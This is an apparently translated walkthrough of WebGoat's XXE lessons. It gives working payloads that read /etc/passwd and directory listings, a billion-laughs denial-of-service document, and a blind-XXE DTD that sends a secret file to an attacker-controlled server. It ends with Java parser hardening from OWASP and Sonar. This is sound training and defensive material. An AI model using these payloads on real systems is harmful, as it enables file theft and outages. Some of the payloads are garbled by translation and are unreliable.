webgoat- XML External Entity-XXE-XML entity injection

01 -XML entity injection

concept
This course explains how to perform an XML external entity attack and how to abuse and prevent it.

Target
Users should have basic knowledge of XML

Users will learn how XML parsers work

Users will learn how to perform an XXE attack and how to protect against it.

02 XML entities?

XML entities allow defining tags that will be replaced by content when parsing an XML document. Generally speaking, entities are divided into three types:

internal entity

external entity

Parameter entity.

Entities must be created in a document type definition (DTD)

Once the XML document is processed by the parser, it replaces the defined entity with the defined constant “Jo Smith”. As you can see this has a lot of advantages as you can js change to e.g. “John Smith” in one place.

In Java applications, XML can be used to get data from client to server, we are all familiar with JSON api, we can also use xml to get information. Most of the time the framework will automatically populate Java objects based on the xml structure, for example:

What is XXE injection?

An XML external entity attack is an attack against applications that parse XML input. This attack occurs when XML input containing references to external entities is processed by a weakly configured XML parser. This attack can lead to confidential data disclosure, denial of service, server-side request forgery, port scanning from the perspective of the machine where the resolver is hosted, and other system impacts.

Attacks may include using file: schemes or relative paths in system identifiers to exfiltrate local files, which may contain sensitive data such as passwords or private user data. Because the attack occurred against an application that processes XML documents, the attacker could potentially use this trusted application to redirect to other internal systems, possibly exfiltrate other internal content via http(s) requests, or target any unprotected internal services. Launch a CSRF attack. In some cases, an XML processor library that is vulnerable to a client-side memory corruption issue could be exploited by dereferencing a malicious URI, potentially allowing arbitrary code execution under the application account. Other attacks can access local resources that may not stop returning data, potentially impacting application availability if too many threads or processes are not freed.

Generally speaking, we can distinguish the following types of XXE attacks:

Classic: In this case, the external entity is contained in the local DTD

Blind: No output and/or errors are shown in the response

Error: Trying to get the resource content in the error message

03 XXE example

XXE Example

Let’s look at an example of XXE injection, in the previous section we saw that XML entities can be used as follows:

<?xml version="1.0" standalone="yes" ?>
<!DOCTYPE author [
  <!ELEMENT author (#PCDATA)>
  <!ENTITY js "Jo Smith">
]>
<author> &js;</author>

External DTD declaration

To define these entities, you can also define another DTD in an external file, for example: (You can also define the DTD in the file and import it)

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "email.dtd">
<email>
  <to>[email protected]</to>
  <from>[email protected]</from>
  <subject>Your app is great, but contains flaws</subject>
  <body>Hi, your application contains some SQL injections</body>
</email>

Email.dtd can be defined as follows:

<!ELEMENT email (to,from,title,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT subject (#PCDATA)>
<!ELEMENT body (#PCDATA)>

XXE

If the XML parser is configured to allow external DTDs or entities, we can change the following XML fragment with:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE author [
  <!ENTITY js SYSTEM "file:///etc/passwd">
]>
<author> &js;</author>

What happens now? We define an include from the local file system and the XML parser will load the file and add content wherever entities are referenced. Assuming an XML message is returned to the user, the message will be:

Anexternal document type definition (DOCTYPE) is something you can always add to your xml document, and if you enable the parser settings to allow processing of external entities, you have a good starting point for finding XXE injections.

04

Goal: List the files in the root directory of the file system.

Provides a function to enter comments. Open burpsuite, open the built-in browser, access and open the page, and comment.

It is found that the payload for submitting a comment request uses xml format data, and the text in text will be displayed directly in the comment area.

Right-click in burpsuite to send reperter, construct the injected XML, modify the body as follows, and send the request again, it will prompt that the customs clearance has been completed.

<?xml version="1.0" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text> & amp;root;</text></ comment>


In the comment area, you can see that the file under the path is displayed, indicating that the injection was successful. (The directory will be output under windows)

The XML is constructed as follows, and the contents of the /etc/passwd file can be displayed in the comment area. This is suitable for linux deployment webgoat.

<?xml version="1.0" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///etc/passwd"> ]><comment><text> & amp;root;</text ></comment>

06 Find XXE through code audit

Now that we know how injection works, let’s look at why this happens. In Java applications, XML library configuration is not safe by default and you must change the settings. Suppose you discover the following code snippet during a code review:

public XmlMapper xmlMapper() {<!-- -->
  return new XmlMapper(XMLInputFactory.newInstance())
}

When looking at the release notes for the Jackson library, you will read:
Disable SUPPORT_DTD unless XMLInputFactory is explicitly overridden
– Jackson 2.7.8 (September 26, 2016)

Question: Is the parser vulnerable?

This code defines a new XmlMapper (ObjectMapper), which is a popular framework for reading and writing xml and json. If we trace the code deeper we find:

This is the “constructor” (1) we called from the list above
Call another “constructor” and initialize a new instance of XmlFactory
Let’s take a look at the source code XMLFactory first

1 This is the “constructor” definition for the new instance created in 3
2 calls another “constructor” defined in 3
In 4 we know if (xmlIn == null) this is not true because if we look at the declaration at the top we create our own instance but in fact XMLInputFactory.newInstance() is not null. This means we have an XML parser that by default cannot prevent XXE injection. The interesting part at points 5 and 6 is the extra protection nested within the if statement.

If we look at the Spring Boot framework, for example how they initialize the same resolver:


https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html

Call the method that safely initializes the parser
XMLInputFactory As you can see, it is explicitly defined via the private method, xmlInputFactory() which actually sets the same properties for the parser as we saw in the previous listing.

As you can see, it’s not that easy to find out if a parser is safe against injection, you really have to dig into the code and libraries to find out what the parser settings are.

Check out the XXE prevention table for more ways to protect your parser. https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html

07 Modern REST framework

In modern REST frameworks the server might be able to accept data formats that you as a developer did not think about. So this might result in JSON endpoints being vulnerable to XXE attacks.
Under the REST framework, even requests that use json to submit data can also be submitted using XML, which may result in XXE.

Again same exercise but try to perform the same XML injection as we did in the first assignment.

As shown in the interface in the figure, the body is in json format, but what if it is changed to xml format?
In burpsuite, Content-Type will be modified: application/xml

body is modified to

This is my first message
, found that the request can be successful


construct xml

<!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text> & amp;root;This is my first message</text></comment>


As you can see, the comments also display the files in the root directory, indicating that the XML injection was successful.

View source code

When the content-type is application/json, it fails directly. When it is application/xml, use xml to parse and check whether comment.getText() contains system files under the corresponding operating system. If the XXE is executed successfully, the directory returned will contain the corresponding file name, it will be successful.

Summary: Restful style framework can also use XML to submit data, and there may be XXE attacks.

09 XXE DOS attack

With the same XXE attack we can perform a DOS service attack towards the server. An example of such an attack is:

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 " & amp;lol; & amp;lol; & amp;lol; & amp;lol; & amp;lol; & amp;lol; & amp;lol; & amp;lol; & amp;lol; &lol;">
 <!ENTITY lol2 " & amp;lol1; & amp;lol1; & amp;lol1; & amp;lol1; & amp;lol1; & amp;lol1; & amp;lol1; & amp;lol1; & amp;lol1; & amp;lol1;">
 <!ENTITY lol3 " & amp;lol2; & amp;lol2; & amp;lol2; & amp;lol2; & amp;lol2; & amp;lol2; & amp;lol2; & amp;lol2; & amp;lol2; &lol2;">
 <!ENTITY lol4 " & amp;lol3; & amp;lol3; & amp;lol3; & amp;lol3; & amp;lol3; & amp;lol3; & amp;lol3; & amp;lol3; & amp;lol3; &lol3;">
 <!ENTITY lol5 " & amp;lol4; & amp;lol4; & amp;lol4; & amp;lol4; & amp;lol4; & amp;lol4; & amp;lol4; & amp;lol4; & amp;lol4; &lol4;">
 <!ENTITY lol6 " & amp;lol5; & amp;lol5; & amp;lol5; & amp;lol5; & amp;lol5; & amp;lol5; & amp;lol5; & amp;lol5; & amp;lol5; &lol5;">
 <!ENTITY lol7 " & amp;lol6; & amp;lol6; & amp;lol6; & amp;lol6; & amp;lol6; & amp;lol6; & amp;lol6; & amp;lol6; & amp;lol6; &lol6;">
 <!ENTITY lol8 " & amp;lol7; & amp;lol7; & amp;lol7; & amp;lol7; & amp;lol7; & amp;lol7; & amp;lol7; & amp;lol7; & amp;lol7; &lol7;">
 <!ENTITY lol9 " & amp;lol8; & amp;lol8; & amp;lol8; & amp;lol8; & amp;lol8; & amp;lol8; & amp;lol8; & amp;lol8; & amp;lol8; &lol8;">
]>
<lolz> & amp;lol9;</lolz>

When XML parser loads this document, it sees that it includes one root element, “lolz”, that contains the text “ & amp;lol9;”. However, “ & amp;lol9;” is a defined entity that expands to a string containing ten “ & amp;lol8;” strings. Each “ & amp;lol8;” string is a defined entity that expands to ten “ & amp;lol7;” strings, and so on. After all the entity expansions have been processed, this small (< 1 KB) block of XML will actually take up almost 3 gigabytes of memory.

This is called a “Billion laughs”, more information can be found here: https://en.wikipedia.org/wiki/Billion_laughs

10 blind XEE

In some cases you won’t see any output because although your attack may work, the field is not reflected in the page’s output. Or the resource you are trying to read contains illegal XML characters, which causes the parser to fail. Let’s start with an example, in this case we are referencing an external DTD, which we control on our own server.

As the attacker you control WebWolf (this can be any server under your control), for example you can use this server to ping it with the following command http://10.100.33.188:9090/home

How can we use this endpoint to verify that we can perform XXE?

We can again use WebWolf to host a file called , creating a file with the following content: attack.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY ping SYSTEM '<a href="http://10.100.33.188:9090/landing" target="_blank" rel="noopener"><a href="http://10.100.33.188:9090/landing " class="bare">http://10.100.33.188:9090/landing</a></a>'>

Now submit the form and change the xml to:

%remote;
]>


test&ping;

Now browse to “Incoming Requests” in WebWolf and you will see:

{
“method” : “GET”,
“path” : “/landing”,
“headers” : {
“request” : {
“user-agent” : “Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0”,
},
},
“parameters” : {
“test” : [ “HelloWorld” ],
},
“timeTaken” : “1”
}
Therefore, using XXE, we are able to ping our own server, which means XXE injection is possible. So with XXE injection we are basically able to achieve the same effect as we started with the curl command.

Blind XXE assignment

https://zhuanlan.zhihu.com/p/69056318

The question requires uploading the password file of webgoat to webwolf. DTD can be uploaded using webwolf.
Source code

 @PostMapping(path = "xxe/blind", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
  @ResponseBody
  public AttackResult addComment(@RequestBody String commentStr) {<!-- -->
    var fileContentsForUser = userToFileContents.getOrDefault(getWebSession().getUser(), "");

    // Solution is posted by the user as a separate comment
    if (commentStr.contains(fileContentsForUser)) {<!-- -->
      return success(this).build();
    }

    try {<!-- -->
      Comment comment = comments.parseXml(commentStr);
      if (fileContentsForUser.contains(comment.getText())) {<!-- -->
        comment.setText("Nice try, you need to send the file to WebWolf");
      }
      comments.addComment(comment, false);
    } catch (Exception e) {<!-- -->
      return failed(this).output(e.toString()).build();
    }
    return failed(this).build();
  }

Here is the source code of the windows version. There is a problem. Only the file content is submitted directly as commentStr. CommentStr is compared with the file content. If it is included, it will pass.
It’s obviously wrong. should be parsed.
So first modify the source code and change the result containing the content after parsing to success.

If you are lazy and use the file address in xml to request directly, it will pass, because you directly request the file content in file, and the returned result is consistent with the file content.

What the question wants to do:

a.dtd script, upload it to wolf and get a URL address of the file.

<!ENTITY % file SYSTEM "file:///C:/Users/Administrator/.webgoat-2023.5-SNAPSHOT/XXE/yangyali/secret.txt">
<!ENTITY % a "<!ENTITY attack SYSTEM 'http://127.0.0.1:9090/landing?text=%file;'>">
%a;

xml request xxe/blind interface, completed.

<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % remote SYSTEM "http://127.0.0.1:9090/files/yangyali/f.dtd">
%remote;
]>
<comment><text> & amp;attack;</text></comment>

The principle is that in the external dtd file, use the file variable to obtain the file content, and then use the attack entity to obtain the text. Make the parsed comment text the file content.

The pitfall of this question is that the source code is wrong. And being unfamiliar with XML makes it difficult to do it.

12 How to protect against XML injection?

Set XML parser to disable DTD

To prevent XXE attacks, you need to ensure that input received from untrusted clients is validated. In the Java world, you can also instruct the parser to ignore the DTD entirely, for example:

XMLInputFactory xif = XMLInputFactory.newFactory();
xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);

Set XML parser to disable external entities

If DTD support cannot be turned off completely, you can also instruct the XML parser to ignore external entities, for example:

XMLInputFactory xif = XMLInputFactory.newFactory();
xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
xif.setProperty(XMLInputFactory.SUPPORT_DTD, true);

For configuration details, see the XXE Protection Sheet https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html

Verify the content-type and accept in the http header

Implement proper validation for Content-type and Accept headers, and don’t simply rely on the framework to handle incoming requests. If the client specifies the correct accept header, “406/Not Acceptable” is returned. If the body is in json format, bodies in other formats are not accepted.

Filter in submitted data

13 Find XXE issues through static code analysis

Static code analysis can help identify vulnerabilities in your code. A well-known static code analysis tool is SonarQube. When you run a code scan on WebGoat’s source code, you’ll get results like this:

Sonar OWASP issues
If you select the XXE category, it will show the location of XXE vulnerabilities.

The following is the result of my scan

XXE issue in Comments class
The next step is to determine whether this is a real problem or a false positive. As you already know from the challenge exercise, this is a real problem. In this case, it was put in intentionally.

SonarQube also shows you what you can do to resolve this issue. Just set the two given properties to empty.

When setting attribute restrictions and requesting question 4 again, a message indicating that the external document cannot be read appears.

XXE suggested fix
If you click the button below you can try the XXE challenge again and you will notice that the vulnerability has been mitigated.

Reference: https://blog.csdn.net/hee_mee/article/details/106751066

XML rules in sonar

XML parsing should avoid XXE vulnerabilities
XML allows the use of internal or external entities (via the file system or network), which may lead to information disclosure or SSRF.

The following XML defines an external entity to read /etc/passwd file

<?xml version="1.0" encoding="utf-8"?>
  <!DOCTYPE test [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
  ]>
<note xmlns="http://www.w3schools.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <to> &xxe;</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend!</body>
</note>

In this XSL document, network access is allowed which can lead to SSRF vulnerabilities:
In this XSL document, allowing network access may cause SSRF issues.

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.attacker.com/evil.xsl">
  <xsl:import href="http://www.attacker.com/evil.xsl"/>
  <xsl:include href="http://www.attacker.com/evil.xsl"/>
 <xsl:template match="/">
   &content;
 </xsl:template>
</xsl:stylesheet>

It is recommended to disable access to external entities and network access in general.
It is recommended to disable the use of external entities and network access

To protect Java XML Parsers from XXE attacks these properties have been defined since JAXP 1.5:
In order to protect java xml parsing from XXE attacks, the following attributes are available after JAXP 1.5.
ACCESS_EXTERNAL_DTD: should be set to “” when processing XML/XSD/XLS files (it looks for external DOCTYPEs)
ACCESS_EXTERNAL_SCHEMA: should be set to “” when processing XML/XSD/XLS files (it looks for external schemalocation ect)
ACCESS_EXTERNAL_STYLESHEET should be set to “” when processing XLS file (it looks for external imports, includes ect);

Note that Apache Xerces is still based on JAXP 1.4, therefore one solution is to set to false the external-general-entities feature.

Avoid FEATURE_SECURE_PROCESSING feature to protect from XXE attacks because depending on the implementation:

it has no effect to protect the parser from XXE attacks but helps guard against excessive memory consumption from XML processing.
or it’s just an obscur shortcut (it could set ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA to “” but without guarantee).
When setting an entity resolver to null (eg: setEntityResolver(null)) the parser will use its own resolution, which is unsafe.

Non-compliance plan

DocumentBuilderFactory library:

String xml = "xxe.xml";
DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
DocumentBuilder builder = df.newDocumentBuilder(); // Noncompliant
Document document = builder.parse(new InputSource(xml));
DOMSource domSource = new DOMSource(document);

SAXParserFactory library:

String xml = "xxe.xml";
SaxHandler handler = new SaxHandler();
SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser parser = factory.newSAXParser(); // Noncompliant
parser.parse(xml, handler);

XMLInputFactory library:

XMLInputFactory factory = XMLInputFactory.newInstance(); // Noncompliant
XMLEventReader eventReader = factory.createXMLEventReader(new FileReader("xxe.xml"));

TransformerFactory library:

String xslt = "xxe.xsl";
String xml = "xxe.xml";
TransformerFactory transformerFactory = javax.xml.transform.TransformerFactory.newInstance(); // Noncompliant
Transformer transformer = transformerFactory.newTransformer(new StreamSource(xslt));

StringWriter writer = new StringWriter();
transformer.transform(new StreamSource(xml), new StreamResult(writer));
String result = writer.toString();

SchemaFactory library:

String xsd = "xxe.xsd";
StreamSource xsdStreamSource = new StreamSource(xsd);

SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI); // Noncompliant
Schema schema = schemaFactory.newSchema(xsdStreamSource);

Validator library:

String xsd = "xxe.xsd";
String xml = "xxe.xml";
StreamSource xsdStreamSource = new StreamSource(xsd);
StreamSource xmlStreamSource = new StreamSource(xml);

SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
Schema schema = schemaFactory.newSchema(xsdStreamSource);
Validator validator = schema.newValidator(); // Noncompliant

StringWriter writer = new StringWriter();
validator.validate(xmlStreamSource, new StreamResult(writer));

Dom4j library:

SAXReader xmlReader = new SAXReader(); // Noncompliant by default
Document xmlResponse = xmlReader.read(xml);

Jdom2 library:

SAXBuilder builder = new SAXBuilder(); // Noncompliant by default
Document document = builder.build(new File(xml));

Compliance Program

DocumentBuilderFactory library:

String xml = "xxe.xml";
DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
df.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
df.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
DocumentBuilder builder = df.newDocumentBuilder();
Document document = builder.parse(new InputSource(xml));
DOMSource domSource = new DOMSource(document);

SAXParserFactory library:

String xml = "xxe.xml";
SaxHandler handler = new SaxHandler();
SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser parser = factory.newSAXParser();
parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
parser.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
parser.parse(xml, handler);

XMLInputFactory library:

XMLInputFactory factory = XMLInputFactory.newInstance();
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant

XMLEventReader eventReader = factory.createXMLEventReader(new FileReader("xxe.xml"));

TransformerFactory library:

String xslt = "xxe.xsl";
String xml = "xxe.xml";
TransformerFactory transformerFactory = javax.xml.transform.TransformerFactory.newInstance();
transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); // Compliant
// ACCESS_EXTERNAL_SCHEMA not supported in several TransformerFactory implementations
Transformer transformer = transformerFactory.newTransformer(new StreamSource(xslt));

StringWriter writer = new StringWriter();
transformer.transform(new StreamSource(xml), new StreamResult(writer));
String result = writer.toString();

SchemaFactory library:

String xsd = "xxe.xsd";
StreamSource xsdStreamSource = new StreamSource(xsd);

SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // Compliant
schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
Schema schema = schemaFactory.newSchema(xsdStreamSource);

Validator library:

String xsd = "xxe.xsd";
String xml = "xxe.xml";
StreamSource xsdStreamSource = new StreamSource(xsd);
StreamSource xmlStreamSource = new StreamSource(xml);

SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
Schema schema = schemaFactory.newSchema(xsdStreamSource);
schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
// validators will also inherit of these properties
Validator validator = schema.newValidator();

validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // Compliant

StringWriter writer = new StringWriter();
validator.validate(xmlStreamSource, new StreamResult(writer));
For dom4j library, ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA are not supported, thus a very strict fix is to disable doctype declarations:

SAXReader xmlReader = new SAXReader();
xmlReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // Compliant
Document xmlResponse = xmlReader.read(xml);

Jdom2 library:

SAXBuilder builder = new SAXBuilder(); // Compliant
builder.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
builder.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // Compliant
Document document = builder.build(new File(xml));

See
OWASP Top 10 2017 Category A4 – XML External Entities (XXE) https://www.owasp.org/index.php/Top_10-2017_A4-XML_External_Entities_(XXE)
OWASP XXE Prevention Cheat Sheet https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java
MITER, CWE-611 – Information Exposure Through XML External Entity Reference
MITER, CWE-827 – Improper Control of Document Type Definition